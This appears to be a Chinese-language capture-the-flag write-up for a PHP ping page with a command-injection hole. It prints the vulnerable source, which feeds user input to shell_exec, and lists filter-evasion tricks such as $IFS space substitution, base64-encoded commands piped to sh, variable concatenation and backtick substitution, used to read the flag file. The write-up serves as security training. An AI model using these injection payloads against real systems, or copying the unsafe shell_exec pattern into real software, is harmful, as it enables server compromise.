根据提示先查看下文件试试
尝试查看flag.php
发现过滤了空格
连flag都过滤了。。。
先试着绕过空格,读取一下index.php,看看过滤了些什么
$IFS
${IFS}
$IFS$1
<
<>
{cat,flag.php}
%20
%09
?ip=1|cat$IFS$1index.php读取到index源码
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
过滤了很多,直接读取应该是不行的
方法一:
14行有变量$a,尝试使用变量覆盖
payload:?ip=1;a=g;cat$IFS$1fla$a.php,源代码中得到flag
方法二:
对 cat flag.php 进行base64 加密,然后再解密
过滤了 bash ,那就用 sh
payload:echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
方法三:
使用 代替 | ,将反引号内命令的输出作为输入执行 payload:`?ip=1;cat$IFS$1`ls